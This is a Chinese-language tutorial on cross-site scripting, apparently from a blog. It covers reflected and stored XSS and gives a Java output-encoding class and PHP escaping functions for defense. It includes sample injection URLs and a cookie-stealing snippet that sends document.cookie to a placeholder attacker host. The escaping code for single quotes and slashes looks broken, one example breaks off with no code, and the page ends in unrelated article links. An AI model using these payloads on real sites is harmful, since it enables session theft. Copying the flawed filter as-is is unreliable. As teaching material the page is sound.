概述

XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器

执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列

表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实

施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨

大的,是web安全的头号大敌。

攻击的条件

实施XSS攻击需要具备两个条件:

一、需要向web页面注入恶意代码;

二、这些恶意代码能够被浏览器成功的执行。

看一下下面这个例子:



<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"

        code="var a = document.createElement('a');

        a.innerHTML= '执行了恶意代码';document.body.appendChild(a);

        //这这里执行代码

        "></div>

相信很多程序员都觉得这个代码很正常,其实这个代码就存在一个反射型的XSS攻击,假如输入下面的地址:

http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="

最终反射出来的HTML代码:

    <div>

    <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />

    </div>

也许您会觉得把ValidateRequest设置为true或者保持默认值就能高枕无忧了,其实这种情况还可以输入下面的地址达到相同的攻击效果:

http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="

根据XSS攻击的效果可以分为几种类型

第一、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

第二、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。

XSS攻击能做些什么

1.窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:



var i=document.createElement("img");

document.body.appendChild(i);

i.src = "http://www.hackerserver.com/?c=" + document.cookie

2.读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等,如代码:

解决方法

一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码

import java.net.URLEncoder;

/**

 * 过滤非法字符工具类

 *

 */

public class EncodeFilter {

    //过滤大部分html字符

    public static String encode(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            switch (ch) {

                case '&': sb.append("&amp;");

                    break;

                case '<': sb.append("&lt;");

                    break;

                case '>': sb.append("&gt;");

                    break;

                case '"': sb.append("&quot;");

                    break;

                case '\'': sb.append("'");

                    break;

                case '/': sb.append("/");

                    break;

                default: sb.append(ch);

            }

        }

        return sb.toString();

    }

    //js端过滤

    public static String encodeForJS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // do not encode alphanumeric characters and ',' '.' '_'

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9' ||

                    ch == ',' || ch == '.' || ch == '_') {

                sb.append(ch);

            } else {

                String temp = Integer.toHexString(ch);

                // encode up to 256 with \\xHH

                if (ch < 256) {

                    sb.append('\\').append('x');

                    if (temp.length() == 1) {

                        sb.append('0');

                    }

                    sb.append(temp.toLowerCase());

                // otherwise encode with \\uHHHH

                } else {

                    sb.append('\\').append('u');

                    for (int j = 0, d = 4 - temp.length(); j < d; j ++) {

                        sb.append('0');

                    }

                    sb.append(temp.toUpperCase());

                }

            }

        }

        return sb.toString();

    }

    /**

     * css非法字符过滤

     * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters

    */

    public static String encodeForCSS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // check for alphanumeric characters

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9') {

                sb.append(ch);

            } else {

                // return the hex and end in whitespace to terminate

                sb.append('\\').append(Integer.toHexString(ch)).append(' ');

            }

        }

        return sb.toString();

    }

    /**

     * URL参数编码

     * http://en.wikipedia.org/wiki/Percent-encoding

     */

    public static String encodeURIComponent(String input) {

        return encodeURIComponent(input, "utf-8");

    }

    public static String encodeURIComponent(String input, String encoding) {

        if (input == null) {

            return input;

        }

        String result;

        try {

            result = URLEncoder.encode(input, encoding);

        } catch (Exception e) {

            result = "";

        }

        return result;

    }

    public static boolean isValidURL(String input) {

        if (input == null || input.length() < 8) {

            return false;

        }

        char ch0 = input.charAt(0);

        if (ch0 == 'h') {

            if (input.charAt(1) == 't' &&

                input.charAt(2) == 't' &&

                input.charAt(3) == 'p') {

                char ch4 = input.charAt(4);

                if (ch4 == ':') {

                    if (input.charAt(5) == '/' &&

                        input.charAt(6) == '/') {

                        return isValidURLChar(input, 7);

                    } else {

                        return false;

                    }

                } else if (ch4 == 's') {

                    if (input.charAt(5) == ':' &&

                        input.charAt(6) == '/' &&

                        input.charAt(7) == '/') {

                        return isValidURLChar(input, 8);

                    } else {

                        return false;

                    }

                } else {

                    return false;

                }

            } else {

                return false;

            }

        } else if (ch0 == 'f') {

            if( input.charAt(1) == 't' &&

                input.charAt(2) == 'p' &&

                input.charAt(3) == ':' &&

                input.charAt(4) == '/' &&

                input.charAt(5) == '/') {

                return isValidURLChar(input, 6);

            } else {

                return false;

            }

        }

        return false;

    }

    static boolean isValidURLChar(String url, int start) {

        for (int i = start, c = url.length(); i < c; i ++) {

            char ch = url.charAt(i);

            if (ch == '"' || ch == '\'') {

                return false;

            }

        }

        return true;

    }

}

二、 过滤用户输入的 检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。、严格控制输出

可以利用下面这些函数对出现xss漏洞的参数进行过滤

1、htmlspecialchars() 函数,用于转义处理在页面上显示的文本。

2、htmlentities() 函数,用于转义处理在页面上显示的文本。

3、strip_tags() 函数,过滤掉输入、输出里面的恶意标签。

4、header() 函数,使用header("Content-type:application/json"); 用于控制 json 数据的头部,不用于浏览。

5、urlencode() 函数,用于输出处理字符型参数带入页面链接中。

6、intval() 函数用于处理数值型参数输出页面中。

7、自定义函数,在大多情况下,要使用一些常用的 html 标签,以美化页面显示,如留言、小纸条。那么在这样的情况下,要采用白名单的方法使用合法的标签显示,过滤掉非法的字符。

各语言示例:

  PHP的htmlentities()或是htmlspecialchars()。

   Python的cgi.escape()。

   ASP的Server.HTMLEncode()。

   ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library

   Java的xssprotect(Open Source Library)。

   Node.js的node-validator。

XSS攻击原理及防御措施的更多相关文章

  1. PHP 安全三板斧:过滤、验证和转义之转义篇 & Blade模板引擎避免XSS攻击原理探究

    PHP 转义 实现 把输出渲染成网页或API响应时,一定要转义输出,这也是一种防护措施,能避免渲染恶意代码,造成XSS攻击,还能防止应用的用户无意中执行恶意代码. 我们可以使用前面提到的 htmlen ...

  2. XSS攻击原理、示例和防范措施

    XSS攻击 XSS(Cross-Site Scripting,跨站脚本)攻击历史悠久,是危害范围非常广的攻击方式. Cross-Site Stripting的缩写本应该是CSS,但是为了避免和Casc ...

  3. Web前端攻击方式及防御措施

    一.XSS [Cross Site Script]跨站脚本攻击 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户 ...

  4. 简单了解:Web前端攻击方式及防御措施

    一.XSS [Cross Site Script]跨站脚本攻击  恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用 ...

  5. CSRF 攻击原理和防御方法

    1. CSRF攻击原理 CSRF(Cross site request forgery),即跨站请求伪造.我们知道XSS是跨站脚本攻击,就是在用户的浏览器中执行攻击者的脚本,来获得其cookie等信息 ...

  6. CSRF攻击原理及防御

    一.CSRF攻击原理 CSRF是什么呢?CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性.想要深入理解CSRF的攻击特性我们有必要 ...

  7. 不可不知 DDoS的攻击原理与防御方法

    DoS攻击.DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service ...

  8. 浅谈JavaScript DDOS 攻击原理与防御

    前言 DDoS(又名"分布式拒绝服务")攻击历史由来已久,但却被黑客广泛应用.我们可以这样定义典型的DDoS攻击:攻击者指使大量主机向服务器发送数据,直到超出处理能力进而无暇处理正 ...

  9. web安全之XSS攻击原理及防范

    阅读目录 一:什么是XSS攻击? 二:反射型XSS 三:存储型XSS 四:DOM-based型XSS 五:SQL注入 六:XSS如何防范? 1. cookie安全策略 2. X-XSS-Protect ...

随机推荐

  1. sqoop1.4.6从mysql导入hdfs\hive\hbase实例

    //验证sqoop是否连接到mysql数据库sqoop list-tables --connect 'jdbc:mysql://n1/guizhou_test?useUnicode=true& ...

  2. 如何用java创建一个jdbc程序

    第一个jdbc程序 JDBC简介 Java数据库连接(Java Database Connectivity,JDBC),是一种用于执行SQL语句的Java API,它由一组用Java编程语言编写的类和 ...

  3. 2017CCPC秦皇岛G ZOJ 3987Numbers(大数+贪心)

    Numbers Time Limit: 2 Seconds      Memory Limit: 65536 KB DreamGrid has a nonnegative integer n . He ...

  4. LCIS(区间合并)

    LCIS Time Limit: 6000/2000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) Total Submissi ...

  5. js跨域问题解决方案

     跨域:当协议.域名.端口号任何一个不相同时,叫称为跨域.   HTML5  CORS(cross-origin-resource-sharing)跨域资源共享: 原理:当需要访问跨域的资源时,可以通 ...

  6. cloneNode克隆节点在不同浏览器的差异

    cloneNode是用于克隆节点的,如果待克隆的节点还有子节点以及自定义属性.添加的有事件,那么克隆时,可以指定是克隆节点本身,还是将其所有子节点信息也克隆进去,这是通过给cloneNode传递一个布 ...

  7. Virtual

    Virtual 作用: 允许在派生类中重新定义与基类同名函数并且可以通过其类的指针或引用来访问基类何派生类的同名函数. 1. 概述简单地说,每一个含有虚函数(无论是其本身的,还是继承而来的)的类都至少 ...

  8. 一:详解 HTTP 协议

    本篇文章篇幅比较长,先来个思维导图预览一下. 一张图带你看完本篇文章 一.概述 1.计算机网络体系结构分层 计算机网络体系结构分层 2.TCP/IP 通信传输流 利用 TCP/IP 协议族进行网络通信 ...

  9. [转载] 说说JSON和JSONP,也许你会豁然开朗

    转载自http://kb.cnblogs.com/page/139725/ 前言 由于Sencha Touch 2这种开发模式的特性,基本决定了它原生的数据交互行为几乎只能通过AJAX来实现. 当然了 ...

  10. 前端面试题(6)图片格式jpg,gif,png-8,png-24的区别,及其各自的使用场景

    Gif格式特点: 透明性,Gif是一种布尔透明类型,既它可以是全透明,也可以是全不透明,但是它并没有半透明(alpha透明). 动画,Gif这种格式支持动画. 无损耗性,Gif是一种无损耗的图像格式, ...